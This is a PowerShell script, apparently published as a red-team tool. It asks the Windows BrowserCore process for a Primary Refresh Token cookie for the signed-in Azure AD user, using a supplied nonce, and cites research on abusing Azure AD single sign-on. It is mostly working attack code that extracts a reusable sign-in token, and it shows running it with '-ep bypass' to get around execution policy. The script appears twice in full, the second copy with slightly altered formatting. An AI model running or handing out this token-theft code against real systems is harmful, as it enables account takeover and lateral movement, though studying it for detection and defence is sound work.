tijldeneut/RequestPRTToken.ps1

## RequestPRTToken.ps1
## Written by Photubias, based on https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/
## Example: powershell -ep bypass .\RequestPRTToken.ps1
[CmdletBinding()]
Param (
    [Parameter(Mandatory=$True,Position=1)]$Nonce
)
## Example of a nonce: AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA
#$nonce = 'AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA'
#$query = '{"method": "GetCookies", "sender": "https://login.microsoftonline.com", "uri": "https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNkNDM5NzkwMjVlYThhYTMyZGYtMGVlZi00Mjk4LWE2ODktY2Q2ZjllODU4ZjNk&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=nl&mkt=nl&client-request-id=d738dfc8-db89-4f27-9522-eb70aa55c2b3&sso_nonce=AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA"}'
$query = '{"method": "GetCookies", "sender": "https://login.microsoftonline.com", "uri": "https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNkNDM5NzkwMjVlYThhYTMyZGYtMGVlZi00Mjk4LWE2ODktY2Q2ZjllODU4ZjNk&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=nl&mkt=nl&client-request-id=d738dfc8-db89-4f27-9522-eb70aa55c2b3&sso_nonce='+$Nonce+'"}'

# Convert string to byte array
$data = [system.Text.Encoding]::UTF8.GetBytes($query)


$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessInfo.FileName = "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
# On older systems this could be C:\Windows\BrowserCore\browsercore.exe
$ProcessInfo.RedirectStandardInput = $true
$ProcessInfo.RedirectStandardOutput = $true
$ProcessInfo.UseShellExecute = $false
$Proc = New-Object System.Diagnostics.Process
$Proc.StartInfo = $ProcessInfo
$Proc.Start() | Out-Null

$Writer = new-object System.IO.BinaryWriter($proc.StandardInput.BaseStream);
$Writer.Write([int]$data.length)
$Writer.Write($data, 0, $data.length)
$Writer.flush()
$writer.close()

$Proc.WaitForExit()
$Proc.StandardOutput.ReadToEnd()
	## Written by Photubias, based on https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/
	## Example: powershell -ep bypass .\RequestPRTToken.ps1
	[CmdletBinding()]
	Param (
	[Parameter(Mandatory=$True,Position=1)]$Nonce
	)
	## Example of a nonce: AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA
	#$nonce = 'AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA'
	#$query = '{"method": "GetCookies", "sender": "https://login.microsoftonline.com", "uri": "https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNkNDM5NzkwMjVlYThhYTMyZGYtMGVlZi00Mjk4LWE2ODktY2Q2ZjllODU4ZjNk&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=nl&mkt=nl&client-request-id=d738dfc8-db89-4f27-9522-eb70aa55c2b3&sso_nonce=AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA"}'
	$query = '{"method": "GetCookies", "sender": "https://login.microsoftonline.com", "uri": "https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNkNDM5NzkwMjVlYThhYTMyZGYtMGVlZi00Mjk4LWE2ODktY2Q2ZjllODU4ZjNk&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=nl&mkt=nl&client-request-id=d738dfc8-db89-4f27-9522-eb70aa55c2b3&sso_nonce='+$Nonce+'"}'

	# Convert string to byte array
	$data = [system.Text.Encoding]::UTF8.GetBytes($query)


	$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
	$ProcessInfo.FileName = "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
	# On older systems this could be C:\Windows\BrowserCore\browsercore.exe
	$ProcessInfo.RedirectStandardInput = $true
	$ProcessInfo.RedirectStandardOutput = $true
	$ProcessInfo.UseShellExecute = $false
	$Proc = New-Object System.Diagnostics.Process
	$Proc.StartInfo = $ProcessInfo
	$Proc.Start() \| Out-Null

	$Writer = new-object System.IO.BinaryWriter($proc.StandardInput.BaseStream);
	$Writer.Write([int]$data.length)
	$Writer.Write($data, 0, $data.length)
	$Writer.flush()
	$writer.close()

	$Proc.WaitForExit()
	$Proc.StandardOutput.ReadToEnd()